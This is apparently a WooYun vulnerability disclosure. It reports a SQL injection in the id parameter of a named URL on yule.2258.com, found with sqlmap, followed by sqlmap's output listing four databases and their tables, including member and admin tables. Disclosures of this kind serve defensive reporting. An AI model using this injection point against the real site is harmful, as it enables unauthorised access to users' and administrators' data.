WooYun.org

利用SQLMAP扫描注入URL：http://yule.2258.com/mingxing/pandian/940746.html?id=940746

以下是导出的部分数据：
available databases [4]:
[*] finance
[*] information_schema
[*] test
[*] uc
Database: finance
[266 tables]
+-------------------------------+
| phome_cj_news |
| phome_ecms_article |
| phome_ecms_article_data_1 |
| phome_ecms_article_doc |
| phome_ecms_article_doc_data |
| phome_ecms_download |
| phome_ecms_download_data_1 |
| phome_ecms_download_doc |
| phome_ecms_download_doc_data |
| phome_ecms_flash |
| phome_ecms_flash_data_1 |
| phome_ecms_flash_doc |
| phome_ecms_flash_doc_data |
| phome_ecms_info |
| phome_ecms_info_data_1 |
| phome_ecms_info_doc |
| phome_ecms_info_doc_data |
| phome_ecms_infoclass_article |
| phome_ecms_infoclass_download |
| phome_ecms_infoclass_flash |
| phome_ecms_infoclass_info |
| phome_ecms_infoclass_movie |
| phome_ecms_infoclass_news |
| phome_ecms_infoclass_news1 |
| phome_ecms_infoclass_news2 |
| phome_ecms_infoclass_news3 |
| phome_ecms_infoclass_news4 |
| phome_ecms_infoclass_news5 |
| phome_ecms_infoclass_news6 |
| phome_ecms_infoclass_news7 |
| phome_ecms_infoclass_news8 |
| phome_ecms_infoclass_news9 |
| phome_ecms_infoclass_photo |
| phome_ecms_infoclass_shop |
| phome_ecms_infotmp_article |
| phome_ecms_infotmp_download |
| phome_ecms_infotmp_flash |
| phome_ecms_infotmp_info |
| phome_ecms_infotmp_movie |
| phome_ecms_infotmp_news |
| phome_ecms_infotmp_news1 |
| phome_ecms_infotmp_news2 |
| phome_ecms_infotmp_news3 |
| phome_ecms_infotmp_news4 |
| phome_ecms_infotmp_news5 |
| phome_ecms_infotmp_news6 |
| phome_ecms_infotmp_news7 |
| phome_ecms_infotmp_news8 |
| phome_ecms_infotmp_news9 |
| phome_ecms_infotmp_photo |
| phome_ecms_infotmp_shop |
| phome_ecms_mfdh |
| phome_ecms_movie |
| phome_ecms_movie_data_1 |
| phome_ecms_movie_doc |
| phome_ecms_movie_doc_data |
| phome_ecms_news |
| phome_ecms_news1 |
| phome_ecms_news1_click |
| phome_ecms_news1_data_1 |
| phome_ecms_news1_doc |
| phome_ecms_news1_doc_data |
| phome_ecms_news2 |
| phome_ecms_news2_click |
| phome_ecms_news2_data_1 |
| phome_ecms_news2_doc |
| phome_ecms_news2_doc_data |
| phome_ecms_news3 |
| phome_ecms_news3_click |
| phome_ecms_news3_data_1 |
| phome_ecms_news3_doc |
| phome_ecms_news3_doc_data |
| phome_ecms_news4 |
| phome_ecms_news4_click |
| phome_ecms_news4_data_1 |
| phome_ecms_news4_doc |
| phome_ecms_news4_doc_data |
| phome_ecms_news5 |
| phome_ecms_news5_click |
| phome_ecms_news5_data_1 |
| phome_ecms_news5_doc |
| phome_ecms_news5_doc_data |
| phome_ecms_news6 |
| phome_ecms_news6_click |
| phome_ecms_news6_data_1 |
| phome_ecms_news6_doc |
| phome_ecms_news6_doc_data |
| phome_ecms_news7 |
| phome_ecms_news7_click |
| phome_ecms_news7_data_1 |
| phome_ecms_news7_doc |
| phome_ecms_news7_doc_data |
| phome_ecms_news8 |
| phome_ecms_news8_click |
| phome_ecms_news8_data_1 |
| phome_ecms_news8_doc |
| phome_ecms_news8_doc_data |
| phome_ecms_news9 |
| phome_ecms_news9_click |
| phome_ecms_news9_data_1 |
| phome_ecms_news9_doc |
| phome_ecms_news9_doc_data |
| phome_ecms_news_click |
| phome_ecms_news_data_1 |
| phome_ecms_news_doc |
| phome_ecms_news_doc_data |
| phome_ecms_photo |
| phome_ecms_photo_data_1 |
| phome_ecms_photo_doc |
| phome_ecms_photo_doc_data |
| phome_ecms_shop |
| phome_ecms_shop_data_1 |
| phome_ecms_shop_doc |
| phome_ecms_shop_doc_data |
| phome_ecms_sinajj |
| phome_ecms_xgwz |
| phome_enewsad |
| phome_enewsadclass |
| phome_enewsadminstyle |
| phome_enewsbefrom |
| phome_enewsbq |
| phome_enewsbqclass |
| phome_enewsbqtemp |
| phome_enewsbqtempclass |
| phome_enewsbuybak |
| phome_enewsbuygroup |
| phome_enewscard |
| phome_enewsclass |
| phome_enewsclassadd |
| phome_enewsclassf |
| phome_enewsclasstemp |
| phome_enewsclasstempclass |
| phome_enewsdiggips |
| phome_enewsdo |
| phome_enewsdolog |
| phome_enewsdownerror |
| phome_enewsdownrecord |
| phome_enewsdownurlqz |
| phome_enewserrorclass |
| phome_enewsf |
| phome_enewsfava |
| phome_enewsfavaclass |
| phome_enewsfeedback |
| phome_enewsfeedbackclass |
| phome_enewsfeedbackf |
| phome_enewsfile |
| phome_enewsgbook |
| phome_enewsgbookclass |
| phome_enewsgfenip |
| phome_enewsgroup |
| phome_enewshy |
| phome_enewshyclass |
| phome_enewsindexpage |
| phome_enewsinfoclass |
| phome_enewsinfotype |
| phome_enewsinfovote |
| phome_enewsjstemp |
| phome_enewsjstempclass |
| phome_enewskey |
| phome_enewslink |
| phome_enewslinkclass |
| phome_enewslinktmp |
| phome_enewslisttemp |
| phome_enewslisttempclass |
| phome_enewslog |
| phome_enewsloginfail |
| phome_enewsmember |
| phome_enewsmemberadd |
| phome_enewsmemberf |
| phome_enewsmemberfeedback |
| phome_enewsmemberform |
| phome_enewsmembergbook |
| phome_enewsmembergroup |
| phome_enewsmenu |
| phome_enewsmenuclass |
| phome_enewsmod |
| phome_enewsnewstemp |
| phome_enewsnewstempclass |
| phome_enewsnotcj |
| phome_enewspage |
| phome_enewspageclass |
| phome_enewspagetemp |
| phome_enewspayapi |
| phome_enewspayrecord |
| phome_enewspic |
| phome_enewspicclass |
| phome_enewspl |
| phome_enewspl_data_1 |
| phome_enewsplayer |
| phome_enewsplf |
| phome_enewspltemp |
| phome_enewspostdata |
| phome_enewspostserver |
| phome_enewsprinttemp |
| phome_enewspublic |
| phome_enewspubtemp |
| phome_enewspubvar |
| phome_enewspubvarclass |
| phome_enewsqmsg |
| phome_enewssearch |
| phome_enewssearchall |
| phome_enewssearchall_load |
| phome_enewssearchtemp |
| phome_enewssearchtempclass |
| phome_enewsshopdd |
| phome_enewsshoppayfs |
| phome_enewsshopps |
| phome_enewssp |
| phome_enewssp_1 |
| phome_enewssp_2 |
| phome_enewssp_3 |
| phome_enewssp_3_bak |
| phome_enewsspacestyle |
| phome_enewsspclass |
| phome_enewssql |
| phome_enewstable |
| phome_enewstags |
| phome_enewstagsclass |
| phome_enewstagsdata |
| phome_enewstask |
| phome_enewstempbak |
| phome_enewstempgroup |
| phome_enewstempvar |
| phome_enewstempvarclass |
| phome_enewstogzts |
| phome_enewsuser |
| phome_enewsuseradd |
| phome_enewsuserclass |
| phome_enewsuserjs |
| phome_enewsuserlist |
| phome_enewsvote |
| phome_enewsvotemod |
| phome_enewsvotetemp |
| phome_enewswapstyle |
| phome_enewswfinfo |
| phome_enewswfinfolog |
| phome_enewswords |
| phome_enewsworkflow |
| phome_enewsworkflowitem |
| phome_enewswriter |
| phome_enewsyh |
| phome_enewszt |
| phome_enewsztadd |
| phome_enewsztclass |
| phome_enewsztf |
| phome_score_0 |
| phome_smallimg_0 |
| phome_smallimg_1 |
| phome_smallimg_2 |
| phome_smallimg_3 |
| phome_smallimg_4 |
| phome_smallimg_5 |
| phome_smallimg_6 |
| phome_smallimg_7 |
| phome_smallimg_8 |
| phome_smallimg_9 |
| phome_smallimg_a |
| phome_smallimg_b |
| phome_smallimg_c |
| phome_smallimg_d |
| phome_smallimg_e |
| phome_smallimg_f |
| phome_sp_titlepic |
| zt_childmk |
| zt_mk |
| zt_mk_news |
+-------------------------------+
Database: information_schema
[40 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: uc
[33 tables]
+---------------------+
| uc_admins |
| uc_applications |
| uc_badwords |
| uc_domains |
| uc_failedlogins |
| uc_feeds |
| uc_friends |
| uc_info |
| uc_mailqueue |
| uc_memberfields |
| uc_members |
| uc_mergemembers |
| uc_newpm |
| uc_notelist |
| uc_pm_indexes |
| uc_pm_lists |
| uc_pm_members |
| uc_pm_messages_0 |
| uc_pm_messages_1 |
| uc_pm_messages_2 |
| uc_pm_messages_3 |
| uc_pm_messages_4 |
| uc_pm_messages_5 |
| uc_pm_messages_6 |
| uc_pm_messages_7 |
| uc_pm_messages_8 |
| uc_pm_messages_9 |
| uc_protectedmembers |
| uc_settings |
| uc_sqlcache |
| uc_tags |
| uc_vars |
| yy_token |
+---------------------+
库test无表